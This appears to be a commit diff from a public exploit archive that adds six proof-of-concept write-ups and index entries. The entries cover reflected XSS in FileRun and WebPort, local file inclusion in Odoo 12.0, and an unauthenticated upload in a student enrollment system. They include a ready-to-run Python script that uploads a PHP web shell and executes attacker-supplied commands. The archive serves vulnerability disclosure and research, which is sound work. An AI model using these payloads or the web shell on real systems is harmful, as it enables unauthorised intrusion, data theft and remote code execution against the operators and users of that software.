DB: 2020-06-23
6 changes to exploits/shellcodes Frigate 2.02 - Denial Of Service (PoC) FileRun 2019.05.21 - Reflected Cross-Site Scripting Student Enrollment 1.0 - Unauthenticated Remote Code Execution Odoo 12.0 - Local File Inclusion Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload WebPort 1.19.1 - Reflected Cross-Site Scripting WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting
This commit is contained in:
parent
7480caf5bd
commit
09b5d3c1b6
7 changed files with 254 additions and 0 deletions
62
exploits/multiple/webapps/48607.txt
Normal file
62
exploits/multiple/webapps/48607.txt
Normal file
|
@ -0,0 +1,62 @@
|
|||
# Exploit Title: FileRun 2019.05.21 - Reflected Cross-Site Scripting
|
||||
# Date: 2019-07-01
|
||||
# Exploit Author: Emre ÖVÜNÇ
|
||||
# Vendor Homepage: https://www.filerun.com/
|
||||
# Software Link: https://filerun.com/download
|
||||
# Version: v2019.05.21
|
||||
# Tested on: Windows/Linux
|
||||
# CVE: CVE-2019-12905
|
||||
|
||||
# CVE-2019-12905
|
||||
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12905
|
||||
# https://github.com/EmreOvunc/FileRun-Vulnerabilities/issues/3
|
||||
|
||||
# PoC
|
||||
|
||||
To exploit vulnerability, someone could upload an allowed file named “><img
|
||||
src=x onerror=prompt(document.domain)> to impact users who open the page.
|
||||
|
||||
POST /filerun/?module=fileman§ion=do&page=up HTTP/1.1
|
||||
Host: [TARGET]
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
|
||||
Gecko/20100101 Firefox/67.0
|
||||
Accept: */*
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://172.16.191.129/filerun/
|
||||
Content-Type: multipart/form-data;
|
||||
boundary=---------------------------142096305821079611661465592403
|
||||
Content-Length: 6034
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Cookie: FileRunSID=aqlneuv86ccj3pi4h476faopi5
|
||||
|
||||
-----------------------------142096305821079611661465592403
|
||||
Content-Disposition: form-data; name="flowTotalSize"
|
||||
|
||||
5100
|
||||
-----------------------------142096305821079611661465592403
|
||||
Content-Disposition: form-data; name="flowIsFirstChunk"
|
||||
|
||||
1
|
||||
-----------------------------142096305821079611661465592403
|
||||
Content-Disposition: form-data; name="flowIsLastChunk"
|
||||
|
||||
1
|
||||
-----------------------------142096305821079611661465592403
|
||||
Content-Disposition: form-data; name="flowFilename"
|
||||
|
||||
â<EFBFBD><EFBFBD>><img src=x onerror=prompt(document.domain)>.jpg
|
||||
-----------------------------142096305821079611661465592403
|
||||
Content-Disposition: form-data; name="path"
|
||||
|
||||
/ROOT/HOME
|
||||
-----------------------------142096305821079611661465592403
|
||||
Content-Disposition: form-data; name="file"; filename="â<><C3A2>><img src=x
|
||||
onerror=prompt(document.domain)>.jpg"
|
||||
Content-Type: image/jpg
|
||||
|
||||
<%@ I said you should learn! %>
|
||||
|
||||
|
||||
-----------------------------142096305821079611661465592403--
|
57
exploits/multiple/webapps/48609.txt
Normal file
57
exploits/multiple/webapps/48609.txt
Normal file
|
@ -0,0 +1,57 @@
|
|||
# Exploit Title: Odoo 12.0 - Local File Inclusion
|
||||
# Date: 2019-06-14
|
||||
# Exploit Author: Emre ÖVÜNÇ
|
||||
# Vendor Homepage: https://www.odoo.com/
|
||||
# Software Link: https://www.odoo.com/tr_TR/page/download
|
||||
# Version: v12.0
|
||||
# Tested on: Windows/Linux
|
||||
# https://github.com/EmreOvunc/Odoo-12.0-LFI-Vulnerabilities
|
||||
# https://www.odoo.com/security-report
|
||||
|
||||
# PoC-1
|
||||
To exploit vulnerability, someone could use
|
||||
'http://[HOST]:8069/base_import/static/c:/windows/win.ini'
|
||||
request to get some information from the target.
|
||||
|
||||
GET /base_import/static/c:/windows/win.ini HTTP/1.1
|
||||
Host: [TARGET]
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
|
||||
Gecko/20100101 Firefox/67.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
# PoC-2
|
||||
To exploit vulnerability, someone could use 'http://[HOST]:8069/
|
||||
web/static/c:/windows/win.ini' request to get some information from the
|
||||
target.
|
||||
|
||||
GET /web/static/c:/windows/win.ini HTTP/1.1
|
||||
Host: [TARGET]
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
|
||||
Gecko/20100101 Firefox/67.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
# PoC-3
|
||||
To exploit vulnerability, someone could use 'http://[HOST]:8069/
|
||||
base/static/c:/windows/win.ini' request to get some information from the
|
||||
target.
|
||||
|
||||
GET /base/static/c:/windows/win.ini HTTP/1.1
|
||||
Host: [TARGET]
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
|
||||
Gecko/20100101 Firefox/67.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
30
exploits/multiple/webapps/48611.txt
Normal file
30
exploits/multiple/webapps/48611.txt
Normal file
|
@ -0,0 +1,30 @@
|
|||
# Exploit Title: WebPort 1.19.1 - Reflected Cross-Site Scripting
|
||||
# Date: 2019-05-30
|
||||
# Exploit Author: Emre ÖVÜNÇ
|
||||
# Vendor Homepage: https://webport.se/
|
||||
# Software Link: https://webport.se/nedladdningar/
|
||||
# Version: v1.19.1
|
||||
# Tested on: Windows/Linux
|
||||
# CVE-2019-12461
|
||||
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12461
|
||||
# https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
|
||||
|
||||
# PoC
|
||||
|
||||
To exploit vulnerability, someone could use 'http://
|
||||
[server]:8090/log?type="</script><script>alert('xss');</script><script>'
|
||||
request
|
||||
to impact users who open a maliciously crafted link or third-party web page.
|
||||
|
||||
GET /log?type=%22%3C/script%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E%3Cscript%3E
|
||||
HTTP/1.1
|
||||
Host: [TARGET]
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
|
||||
Gecko/20100101 Firefox/67.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Cookie: __tiny_sessid=6361847c-952b-45ba-874c-71f1794ffe37
|
||||
Upgrade-Insecure-Requests: 1
|
44
exploits/php/webapps/48608.py
Executable file
44
exploits/php/webapps/48608.py
Executable file
|
@ -0,0 +1,44 @@
|
|||
# Exploit Title: Student Enrollment 1.0 - Unauthenticated Remote Code Execution
|
||||
# Date: 2020-06-22
|
||||
# Exploit Author: Selim Enes 'Enesdex' Karaduman
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14281/online-student-enrollment-system-using-phpmysqli.html
|
||||
# Version: 1.0
|
||||
# Tested on: Windows 10 / WampServer
|
||||
# Usage : python3 exploit.py -u TARGET_URL -c CODE_TO_EXECUTE
|
||||
|
||||
import requests
|
||||
import string
|
||||
import random
|
||||
import sys
|
||||
import getopt
|
||||
|
||||
options, remainder = getopt.gnu_getopt(sys.argv[1:], 'hu:c:')
|
||||
|
||||
for opt, arg in options:
|
||||
if opt in ('-h'):
|
||||
print('Usage: python3 exploit.py -u TARGET_URL -c CODE_TO_EXECUTE')
|
||||
exit()
|
||||
elif opt in ('-u'):
|
||||
url = arg
|
||||
elif opt in ('-c'):
|
||||
cmd = arg
|
||||
|
||||
|
||||
|
||||
res = ''.join(random.choices(string.ascii_uppercase + string.digits, k = 10))
|
||||
|
||||
session = requests.session()
|
||||
|
||||
burp0_url = url+"/admin/register.php"
|
||||
burp0_cookies = {}
|
||||
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.100/student_enrollment/admin/register.php", "Content-Type": "multipart/form-data; boundary=---------------------------5220369311929647034402434351", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
|
||||
burp0_data = "-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n"+res+"\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"email\"\r\n\r\n"+res+"@gmail.com\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+res+"\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n12345678\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"c_password\"\r\n\r\n12345678\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"photo\"; filename=\"a.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n$cmd = shell_exec($_GET['cmd']); echo $cmd;\n?>\n\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"register\"\r\n\r\n\r\n-----------------------------5220369311929647034402434351--\r\n"
|
||||
session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
|
||||
|
||||
rce = requests.get("http://192.168.1.100/student_enrollment/admin/images/"+res+".php?cmd="+cmd)
|
||||
|
||||
get_code = rce.text
|
||||
|
||||
print("Exploit Author--> Selim Enes 'Enesdex' Karaduman")
|
||||
|
||||
print(get_code)
|
24
exploits/php/webapps/48610.txt
Normal file
24
exploits/php/webapps/48610.txt
Normal file
|
@ -0,0 +1,24 @@
|
|||
# Exploit Title: Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-06-20
|
||||
# Exploit Author: BKpatron
|
||||
# Vendor Homepage: https://www.campcodes.com/projects/php/4745/online-student-enrollment-system-in-php-mysqli/
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/student_enrollment_1.zip
|
||||
# Version: v1.0
|
||||
# Tested on: Win 10
|
||||
# CVE: N/A
|
||||
|
||||
# Vulnerability:
|
||||
Online Student Enrollment System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution
|
||||
(RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
|
||||
|
||||
#CSRF PoC:
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/student_enrollment/admin/index.php?page=user-profile" method="POST" enctype="multipart/form-data">
|
||||
<input type="file" name="userphoto" required="" id="photo"><br>
|
||||
<input class="btn btn-info" type="submit" name="upphoto" value="Upload Photo">
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
30
exploits/php/webapps/48612.txt
Normal file
30
exploits/php/webapps/48612.txt
Normal file
|
@ -0,0 +1,30 @@
|
|||
# Exploit Title: WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting
|
||||
# Date: 2019-05-30
|
||||
# Exploit Author: Emre ÖVÜNÇ
|
||||
# Vendor Homepage: https://webport.se/
|
||||
# Software Link: https://webport.se/nedladdningar/
|
||||
# Version: v1.19.1
|
||||
# Tested on: Windows/Linux
|
||||
|
||||
# CVE-2019-12460
|
||||
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12460
|
||||
# https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
|
||||
|
||||
# PoC
|
||||
To exploit vulnerability, someone could use 'http://
|
||||
[server]:8090/access/setup?type="</script><script>alert('xss');</script><script>'
|
||||
request
|
||||
to impact users who open a maliciously crafted link or third-party web page.
|
||||
|
||||
GET /access/setup?type=%22%3C/script%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E%3Cscript%3E
|
||||
HTTP/1.1
|
||||
Host: [TARGET]
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
|
||||
Gecko/20100101 Firefox/67.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Cookie: __tiny_sessid=6361847c-952b-45ba-874c-71f1794ffe37
|
||||
Upgrade-Insecure-Requests: 1
|
|
@ -6750,6 +6750,7 @@ id,file,description,date,author,type,platform,port
|
|||
44481,exploits/windows/dos/44481.py,"Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC)",2018-04-01,"Mr Bruce",dos,windows,
|
||||
38079,exploits/windows/dos/38079.py,"Savant Web Server 3.1 - Denial of-Service (PoC)",2012-01-22,DDD004,dos,windows,
|
||||
43197,exploits/windows/dos/43197.py,"ALLPlayer 7.5 - Denial of-Service (PoC)",2017-11-27,"Kiefer Bauer",dos,windows,
|
||||
48613,"exploits/windows/dos/48613.Frigate 2.","Frigate 2.02 - Denial Of Service (PoC)",2020-06-22,"Paras Bhatia",dos,windows,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -42864,3 +42865,9 @@ id,file,description,date,author,type,platform,port
|
|||
48593,exploits/php/webapps/48593.txt,"College-Management-System-Php 1.0 - Authentication Bypass",2020-06-17,"BLAY ABU SAFIAN",webapps,php,
|
||||
48595,exploits/multiple/webapps/48595.txt,"OpenCTI 3.3.1 - Directory Traversal",2020-06-17,"Raif Berkay Dincel",webapps,multiple,
|
||||
48605,exploits/php/webapps/48605.txt,"Beauty Parlour Management System 1.0 - Authentication Bypass",2020-06-18,"Prof. Kailas PATIL",webapps,php,
|
||||
48607,exploits/multiple/webapps/48607.txt,"FileRun 2019.05.21 - Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,
|
||||
48608,exploits/php/webapps/48608.py,"Student Enrollment 1.0 - Unauthenticated Remote Code Execution",2020-06-22,Enesdex,webapps,php,
|
||||
48609,exploits/multiple/webapps/48609.txt,"Odoo 12.0 - Local File Inclusion",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,
|
||||
48610,exploits/php/webapps/48610.txt,"Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload",2020-06-22,BKpatron,webapps,php,
|
||||
48611,exploits/multiple/webapps/48611.txt,"WebPort 1.19.1 - Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,
|
||||
48612,exploits/php/webapps/48612.txt,"WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue